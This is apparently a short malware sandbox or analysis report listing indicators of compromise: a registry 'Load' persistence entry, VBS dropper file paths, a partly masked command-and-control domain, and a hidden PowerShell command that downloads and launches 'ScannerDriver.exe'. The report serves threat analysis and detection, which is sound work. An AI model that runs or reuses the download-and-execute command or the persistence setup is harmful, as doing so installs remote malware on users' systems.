Technical information
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'Load' = 'C:\Users\Public\config.vbs'
- '<SYSTEM32>\wscript.exe' C:\Users\Public\config.vbs
- http://po#.##wielab.com/c2/agent/20170703142328 as scannerdriver.exe
- C:\users\public\config.txt
- C:\users\public\config.vbs
- C:\users\public\config.txt to C:\users\public\config.vbs
- 'po#.##wielab.com':80
- DNS ASK po#.##wielab.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep Bypass -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadFile('http://po#.##wielab.com/C2/Agent/20170703142328','ScannerDriver.exe'));Start-Process 'ScannerDriver....' (with hidden window)